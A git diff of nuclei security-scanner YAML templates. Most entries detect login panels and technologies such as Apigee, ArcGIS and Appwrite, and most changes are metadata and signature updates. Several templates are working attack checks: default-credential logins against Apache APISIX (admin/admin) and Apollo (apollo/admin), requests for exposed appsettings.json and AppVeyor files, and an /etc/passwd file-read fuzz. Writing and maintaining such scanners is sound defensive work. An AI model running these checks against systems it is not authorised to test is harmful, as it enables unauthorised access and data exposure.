a/nuclei-templates/Other/apigee-panel.yaml b/nuclei-templates/Other/apigee-panel.yaml index 20f33c6936..bd38bff268 100644 --- a/nuclei-templates/Other/apigee-panel.yaml +++ b/nuclei-templates/Other/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" + verified: true tags: panel,apigee,login http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'Version:?\s+([0-9.]+)' -# digest: 490a004630440220688a442d2442a84abe5045f8ed111f8ba36419f7f7ef8a557f7aac684b7a387702204f2fa7abd4fe51946fb0814b71b1efd662356095dfa93b3102bf6c679ef64ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024de85a2064b59024b17d948274dc76df5c6bd4686e677536a0d2fecf1a4caeb022100de0d18e50fc7b9dd92022639756256b0c98e3a3db454035d1565be64993edccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apiman-panel-464.yaml b/nuclei-templates/Other/apiman-panel-462.yaml similarity index 100% rename from nuclei-templates/Other/apiman-panel-464.yaml rename to nuclei-templates/Other/apiman-panel-462.yaml diff --git a/nuclei-templates/Other/apisix-default-login-491.yaml b/nuclei-templates/Other/apisix-default-login-491.yaml deleted file mode 100644 index e3e9553a9a..0000000000 --- a/nuclei-templates/Other/apisix-default-login-491.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: apisix-default-login - -info: - name: Apache Apisix Default Login - author: pdteam - severity: critical - tags: apisix,apache,default-login - metadata: - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org - -requests: - - raw: - - | - POST /apisix/admin/user/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Authorization: - Content-Type: application/json;charset=UTF-8 - - {"username":"{{user}}","password":"{{pass}}"} - - attack: pitchfork - payloads: - user: - - admin - pass: - - admin - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"data"' - - '"token"' - - '"code":0' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/apisix-default-login.yaml b/nuclei-templates/Other/apisix-default-login.yaml new file mode 100644 index 0000000000..c16b0c60b1 --- /dev/null +++ b/nuclei-templates/Other/apisix-default-login.yaml @@ -0,0 +1,37 @@ +id: apisix-default-login +info: + name: Apache Apisix Default Login + author: pdteam + severity: critical + tags: apisix,apache,default-login + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and diff --git a/nuclei-templates/Other/apollo-default-login-521.yaml b/nuclei-templates/Other/apollo-default-login-521.yaml new file mode 100644 index 0000000000..03709bd616 --- /dev/null +++ b/nuclei-templates/Other/apollo-default-login-521.yaml @@ -0,0 +1,55 @@ +id: apollo-default-login + +info: + name: Apollo Default Login + author: PaperPen + severity: high + description: An Apollo default login was discovered. + reference: + - https://github.com/apolloconfig/apollo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:11794165 + tags: apollo,default-login + +http: + - raw: + - | + POST /signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/signin? + + username={{user}}&password={{pass}}&login-submit=Login + - | + GET /user HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - apollo + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '"userId":' + - '"email":' + condition: or + + - type: dsl + dsl: + - "status_code_1 == 302 && status_code_2 == 200" + - "contains(tolower(header_2), 'application/json')" + condition: and + +# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apollo-default-login.yaml b/nuclei-templates/Other/apollo-default-login.yaml deleted file mode 100644 index c9e119d097..0000000000 --- a/nuclei-templates/Other/apollo-default-login.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: apollo-default-login - -info: - name: Apollo Default Login - author: PaperPen - severity: high - description: An Apollo default login was discovered. - reference: - - https://github.com/apolloconfig/apollo - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:11794165 - tags: apollo,default-login - -requests: - - raw: - - | - POST /signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/signin? - - username={{user}}&password={{pass}}&login-submit=Login - - - | - GET /user HTTP/1.1 - Host: {{Hostname}} - - attack: pitchfork - payloads: - user: - - apollo - pass: - - admin - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - '"userId":' - - '"email":' - condition: or - - - type: dsl - dsl: - - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(all_headers_2), 'application/json')" - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-server-detect-522.yaml b/nuclei-templates/Other/apollo-server-detect-522.yaml new file mode 100644 index 0000000000..18fc8f973f --- /dev/null +++ b/nuclei-templates/Other/apollo-server-detect-522.yaml @@ -0,0 +1,37 @@ +id: apollo-server-detect + +info: + name: Apollo Server GraphQL introspection detection + author: idealphase + severity: info + description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). + reference: + - https://github.com/apollographql/apollo-server + tags: apollo,detect,graphql + +requests: + - method: POST + path: + - "{{BaseURL}}/graphql" + + headers: + Content-Type: application/json + + body: | + {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Content-Type: application/json" + + - type: word + part: body + words: + - "GraphQL introspection is not allowed by Apollo Server" + + - type: status + status: + - 400 diff --git a/nuclei-templates/Other/apollo-server-detect.yaml b/nuclei-templates/Other/apollo-server-detect.yaml deleted file mode 100644 index 8c2dee07bc..0000000000 --- a/nuclei-templates/Other/apollo-server-detect.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: apollo-server-detect - -info: - name: Apollo Server GraphQL introspection detection - author: idealphase - severity: info - description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). - reference: https://github.com/apollographql/apollo-server - tags: apollo,detect,graphql - -requests: - - method: POST - path: - - "{{BaseURL}}/graphql" - - headers: - Content-Type: application/json - - body: | - {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "Content-Type: application/json" - - - type: word - part: body - words: - - "GraphQL introspection is not allowed by Apollo Server" - - - type: status - status: - - 400 diff --git a/nuclei-templates/Other/appcms-detect.yaml b/nuclei-templates/Other/appcms-detect.yaml index bc2b1aa95a..0e8a6fb38d 100644 --- a/nuclei-templates/Other/appcms-detect.yaml +++ b/nuclei-templates/Other/appcms-detect.yaml @@ -4,9 +4,12 @@ info: name: AppCms Detect author: princechaddha severity: info + metadata: + max-request: 1 + shodan-query: http.html:"Powerd by AppCMS" tags: tech,appcms -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -28,3 +31,5 @@ requests: group: 1 regex: - '' + +# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apple_app_site.yaml b/nuclei-templates/Other/apple-app-site-association-524.yaml similarity index 100% rename from nuclei-templates/Other/apple_app_site.yaml rename to nuclei-templates/Other/apple-app-site-association-524.yaml diff --git a/nuclei-templates/Other/apple-httpserver.yaml b/nuclei-templates/Other/apple-httpserver.yaml index eb84ca9832..0174b6725c 100644 --- a/nuclei-templates/Other/apple-httpserver.yaml +++ b/nuclei-templates/Other/apple-httpserver.yaml @@ -6,11 +6,12 @@ info: severity: info metadata: verified: true - fofa-query: app="Apple-HttpServer" + max-request: 1 shodan-query: "AppleHttpServer" + fofa-query: app="Apple-HttpServer" tags: tech,apple,httpserver -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -24,3 +25,5 @@ requests: - "AppleHttpServer" - "X-Apple-Request-UUID" condition: or + +# digest: 4a0a00473045022064d6a126bff997cdd86144d8b4617d888a0f352dd6568bfffe849bf75446ae83022100c035796ca18f693c66ae94d4da48c3d127170aa55094eb1e4100a7f438537d9c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Application_level_dos.yaml b/nuclei-templates/Other/application_level_dos.yaml similarity index 100% rename from nuclei-templates/Other/Application_level_dos.yaml rename to nuclei-templates/Other/application_level_dos.yaml diff --git a/nuclei-templates/Other/application_security_gateway.yaml b/nuclei-templates/Other/application_security_gateway.yaml new file mode 100644 index 0000000000..e813792d00 --- /dev/null +++ b/nuclei-templates/Other/application_security_gateway.yaml @@ -0,0 +1,20 @@ +id: application_security_gateway +info: + name: application_security_gateway + author: cn-kali-team + tags: detect,tech,application_security_gateway + severity: info + metadata: + fofa-query: + - ns-icg + product: application_security_gateway + vendor: netentsec + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - ns-icg diff --git a/nuclei-templates/Other/appsettings-file-disclosure.yaml b/nuclei-templates/Other/appsettings-file-disclosure.yaml index f6d0a72737..ac3d7357a5 100644 --- a/nuclei-templates/Other/appsettings-file-disclosure.yaml +++ b/nuclei-templates/Other/appsettings-file-disclosure.yaml @@ -10,15 +10,17 @@ info: - https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag metadata: verified: true + max-request: 2 tags: exposure,files -requests: +http: - method: GET path: - "{{BaseURL}}/appsettings.json" - "{{BaseURL}}/appsettings.Production.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -33,3 +35,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502200ab0a99b7f2a8e0bd193d05bfb9729dd541336eed01eb74041387c3d11c5cd1b022100ceeb9d3c0ca44313f67af0375112f915400c298b3b4e1942f3cce2fef6954809:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/appsmith-web-login.yaml b/nuclei-templates/Other/appsmith-web-login.yaml index 72f869b251..b28180205b 100644 --- a/nuclei-templates/Other/appsmith-web-login.yaml +++ b/nuclei-templates/Other/appsmith-web-login.yaml @@ -9,14 +9,17 @@ info: - https://www.appsmith.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: appsmith shodan-query: http.title:"appsmith" + vendor: appsmith + verified: true tags: panel,appsmith -requests: +http: - method: GET path: - "{{BaseURL}}/user/login" @@ -31,5 +34,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100d7b37c5f11fd7dd4e640706ad39c91ce1f95968e05549a1d3f23c41435625d62022067a75ce8709378d433fe824633e2fbc0596e3d3648681b856cd89fcbadb7dc2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/appspace-panel.yaml b/nuclei-templates/Other/appspace-panel.yaml index 52a060ef87..f571068619 100644 --- a/nuclei-templates/Other/appspace-panel.yaml +++ b/nuclei-templates/Other/appspace-panel.yaml @@ -7,12 +7,14 @@ info: description: Appspace is the workplace experience platform for your whole team that lets you manage it all – from employee communications to your physical office spaces. reference: - https://www.appspace.com/ + classification: + cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 3 - vendor: appspace product: appspace shodan-query: title:"Appspace" + vendor: appspace + verified: true tags: appspace,panel,detect http: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a890af8b1229f17e88ea14f189ad370fbc1fd991e0ab1a8c86fdfc790d6f808022100e9c8a62f28479a1f96d14f5f755f3f5060242a11640c928c3b6ff34aa8ea404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0756e6e209352ea0ac90827c785e76a43448ce465c4a17674774cc59afecdff022100c126685413b98a7d183497b337ff43ddc5a39fa1bb9ea5b12f356761517fe22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/appsuite-panel.yaml b/nuclei-templates/Other/appsuite-panel.yaml index 17b5912610..b47bd4d72d 100644 --- a/nuclei-templates/Other/appsuite-panel.yaml +++ b/nuclei-templates/Other/appsuite-panel.yaml @@ -4,13 +4,15 @@ info: name: Appsuite Login Panel - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: panel,appsuite,detect + vendor: open-xchange + verified: true + tags: panel,appsuite,detect,open-xchange http: - method: GET @@ -32,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d3833a5bbb36893c9570c94dd2482d39db34ca2ea9414064f63c601af519ac8c02206080c31920d7915b8ab9c73b7b5f33c0ea0cb7d4390bec36c3ee9c569d188670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220357235264a8080fbb79afab06fc6d88dfbf974dfc4e18971f90ba1f8a3a81e6e02203cf71150238153cc7029218157a44a4a7717a9b4b9cba32f4b45db904cfbe5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/appveyor-configuration-file.yaml b/nuclei-templates/Other/appveyor-configuration-file.yaml index c14556da9f..699406e852 100644 --- a/nuclei-templates/Other/appveyor-configuration-file.yaml +++ b/nuclei-templates/Other/appveyor-configuration-file.yaml @@ -1,21 +1,28 @@ id: appveyor-configuration-file info: - name: AppVeyor Configuration Exposure + name: AppVeyor Configuration Page - Detect author: DhiyaneshDk severity: medium + description: AppVeyor configuration page was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true + max-request: 2 shodan-query: html:"appveyor.yml" tags: config,exposure,devops -requests: +http: - method: GET path: - "{{BaseURL}}/.appveyor.yml" - "{{BaseURL}}/appveyor.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -27,3 +34,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100eeb8e7ad4f7cb96699c4c80afb972876c0c057ef2a9bef2aafd0b908500bb7d9022100c7bd02f544d2b60bf70bf67049efc78f423a35d25550d713fad8198b851a24d4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/appwrite-panel.yaml b/nuclei-templates/Other/appwrite-panel.yaml index b956b5ae78..4329c6b34e 100644 --- a/nuclei-templates/Other/appwrite-panel.yaml +++ b/nuclei-templates/Other/appwrite-panel.yaml @@ -7,14 +7,14 @@ info: description: Appwrite login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 2 - vendor: appwrite product: appwrite shodan-query: http.favicon.hash:-633108100 + vendor: appwrite + verified: true tags: panel,appwrite,detect http: @@ -28,4 +28,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))" -# digest: 4b0a00483046022100f93ac7c4f1b5ca97c57d959b47531ed78b307e7a9c0f64ff388a3c4bfa9d2c4b022100b39a981b65653ead42764d853ab3a29e71d59b9d7657ebd1f526b6480ed5bbd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f999f1d004f9ce9dc9aa7216e4b888b0638238feb67a00e5df42e973b6151590220347658bd3f22464e6f9c94f8121069d9aaeb9294ee6fe7407fb4e9eda4971527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aptus-detect.yaml b/nuclei-templates/Other/aptus-detect.yaml index 2b2f0ef0c3..986821c1bb 100644 --- a/nuclei-templates/Other/aptus-detect.yaml +++ b/nuclei-templates/Other/aptus-detect.yaml @@ -1,5 +1,4 @@ id: aptus-detect - info: name: Aptus Login Panel author: princechaddha @@ -7,19 +6,16 @@ info: metadata: shodan-query: http.title:"Aptus Login" tags: panel,aptus - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: body words: - "Aptus Login" - - type: status status: - 200 diff --git a/nuclei-templates/Other/aptus-panel.yaml b/nuclei-templates/Other/aptus-panel.yaml index 7482a44bfc..8e2616bac6 100644 --- a/nuclei-templates/Other/aptus-panel.yaml +++ b/nuclei-templates/Other/aptus-panel.yaml @@ -7,13 +7,13 @@ info: description: Aptus login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Aptus Login" tags: panel,aptus -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -28,5 +28,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220640c761126337fc2830e60088a517d2dfb0f5f6713df24554e6b5d2a67e1820a02201dd18f81fff0bd007f61bbfa6cfeb2d714cd2769ac3e5a2e2c2ed5ca7a47d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aqua-enterprise-detect.yaml b/nuclei-templates/Other/aqua-enterprise-detect.yaml index 74c4c83b7c..b50a235804 100644 --- a/nuclei-templates/Other/aqua-enterprise-detect.yaml +++ b/nuclei-templates/Other/aqua-enterprise-detect.yaml @@ -7,10 +7,11 @@ info: reference: https://www.aquasec.com/ metadata: verified: true + max-request: 1 shodan-query: http.favicon.hash:-1261322577 tags: tech,aqua -requests: +http: - method: GET path: - "{{BaseURL}}/api" @@ -34,3 +35,5 @@ requests: group: 1 regex: - '{"version":"([0-9.]+)",' + +# digest: 4b0a00483046022100a8bafcdb9b81a1529340cc59475de5aea1d084f10b9cd4cd0ff24b5b35fcefa8022100cfb69494c1b15bb374ea8b5cb639f6c17973604da3271ba51fbfef70329801fd:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aqua-enterprise-panel.yaml b/nuclei-templates/Other/aqua-enterprise-panel.yaml index de9473cc19..45ed002380 100644 --- a/nuclei-templates/Other/aqua-enterprise-panel.yaml +++ b/nuclei-templates/Other/aqua-enterprise-panel.yaml @@ -10,15 +10,15 @@ info: - https://www.aquasec.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true - shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" google-query: intitle:"Aqua Cloud Native Security Platform" + max-request: 1 + shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" + verified: true tags: panel,aqua,aquasec -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -35,5 +35,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220593d2e3c0053ffb4805eb449e8128d62c48270b1f22b228bd3b55f66c19b5b3c0220671474cb61608750a9c4182d05be825663967cea331656a7048979a5a99a61c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arangodb-web-Interface.yaml b/nuclei-templates/Other/arangodb-web-Interface.yaml index d6742d9673..2b2ff1ee32 100644 --- a/nuclei-templates/Other/arangodb-web-Interface.yaml +++ b/nuclei-templates/Other/arangodb-web-Interface.yaml @@ -8,12 +8,14 @@ info: ArangoDB Web Interface was detected. reference: - https://www.arangodb.com/docs/stable/ + classification: + cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - verified: "true" max-request: 1 - vendor: arangodb product: arangodb shodan-query: http.title:"ArangoDB Web Interface" + vendor: arangodb + verified: "true" tags: panel,arangodb,login http: @@ -30,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb08b8231d49bb6456e8fb52da40302af235e46637edce8411b2067412cb5a0d022069c4f9c7a3d47f53943b9bb7a31c5114d5e4e9a41dc2f3e62c1194310311df90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5e79f701c8ae32d77121cec5ed1e9fabae11c849f798f1618fdfb5fd5a6cbc0022100a47a6d129ae459f8744c509ad9ab8a9223417a903ab0781b9daf4114ca2edb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arbitrary-file-read.yaml b/nuclei-templates/Other/arbitrary-file-read.yaml index 34260c7053..e1fb95913b 100644 --- a/nuclei-templates/Other/arbitrary-file-read.yaml +++ b/nuclei-templates/Other/arbitrary-file-read.yaml @@ -5,7 +5,6 @@ info: author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble) severity: high description: Searches for /etc/passwd on passed URLs. - tags: fuzz,lfi requests: - method: GET diff --git a/nuclei-templates/Other/arcgis-panel-530.yaml b/nuclei-templates/Other/arcgis-panel-531.yaml similarity index 100% rename from nuclei-templates/Other/arcgis-panel-530.yaml rename to nuclei-templates/Other/arcgis-panel-531.yaml diff --git a/nuclei-templates/Other/arcgis-rest-api-532.yaml b/nuclei-templates/Other/arcgis-rest-api-532.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/nuclei-templates/Other/arcgis-rest-api-532.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api-533.yaml b/nuclei-templates/Other/arcgis-rest-api-533.yaml deleted file mode 100644 index b60cfd2026..0000000000 --- a/nuclei-templates/Other/arcgis-rest-api-533.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms - reference: - - https://enterprise.arcgis.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-services.yaml b/nuclei-templates/Other/arcgis-services.yaml index 0ebeba5ee8..df59cea6e3 100644 --- a/nuclei-templates/Other/arcgis-services.yaml +++ b/nuclei-templates/Other/arcgis-services.yaml @@ -7,13 +7,15 @@ info: description: Check for the existence of the "/arcgis/rest/services" path on an ArcGIS server. reference: - https://enterprise.arcgis.com/en/ + classification: + cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: esri product: arcgis_server shodan-query: title:"ArcGIS" - tags: panel,arcgis,rest,api,detect + vendor: esri + verified: true + tags: panel,arcgis,rest,api,detect,esri http: - method: GET @@ -38,4 +40,4 @@ http: group: 1 regex: - 'Current Version:\s*<\/b>\s*([0-9.]+)' -# digest: 4b0a00483046022100a098cf3b3472bbc94ecc5e01a30e81321252b1e2aaa9dfd3fa2dbe15f76ac46002210087775392928656c8ed94592b4188564aa740aac93cedf497be32b3995c610e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dff450061a964e5a154028977c3f879fa27f91712b0b4f7e8295b07199618444022100a508425811e5aee07eab739f769239323b52761d47bdcb35bbe0a980dc972661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arcgis-tokens.yaml b/nuclei-templates/Other/arcgis-tokens.yaml index 4067b93031..4f0e54c77a 100644 --- a/nuclei-templates/Other/arcgis-tokens.yaml +++ b/nuclei-templates/Other/arcgis-tokens.yaml @@ -7,6 +7,8 @@ info: description: Check for the existence of the ArcGIS Token Service on an ArcGIS server. reference: - https://enterprise.arcgis.com/en/ + classification: + cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -30,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064d73cdabe31276ef1cd2782d6906a8a7d2de90f8689fef69e29b855c98752df022100c07126b160bf84f7d071540bccecf623c5178cbc43ac1d87a7dac1cfc36f05d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6fd4b2661759f0d8c49c40100e6b6356ce67fdb4bbae0e06fc3101280d94bc022100a856fd846055182b53a27be92c797ec8654c12875eb5c24dc4f4e872399fd399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/archibus-webcentral-panel.yaml b/nuclei-templates/Other/archibus-webcentral-panel.yaml index 1b2bf100cf..de30e0b585 100644 --- a/nuclei-templates/Other/archibus-webcentral-panel.yaml +++ b/nuclei-templates/Other/archibus-webcentral-panel.yaml @@ -9,14 +9,17 @@ info: - https://archibus.com/products/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 3 + product: web_central shodan-query: http.favicon.hash:889652940 + vendor: archibus + verified: true tags: panel,archibus -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -26,6 +29,7 @@ requests: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -41,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 480a00453043021f1cbba93982a7f1c97794f66bd60726effad52b19e796a50366f2c2ec0985c9022064cf1708246f9077607c98961aa4245a793af499d6e4440a25555aeb3d772788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arcom-malware.yaml b/nuclei-templates/Other/arcom-malware.yaml index a26bb3d29f..8cc32d336f 100644 --- a/nuclei-templates/Other/arcom-malware.yaml +++ b/nuclei-templates/Other/arcom-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,6 @@ file: - type: binary binary: - - "A3242521" \ No newline at end of file + - "A3242521" + +# digest: 4b0a00483046022100c94af5a498c4235c4290fd509d830c181e05b2915d979c951c297aacd1c24f71022100902af9cda3098593dc1e6f28001eecccd32330b65e6f6329d35bf7e48fb757ea:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/arcserve-panel.yaml b/nuclei-templates/Other/arcserve-panel.yaml index 58ac7ccb80..4b8a7cacf1 100644 --- 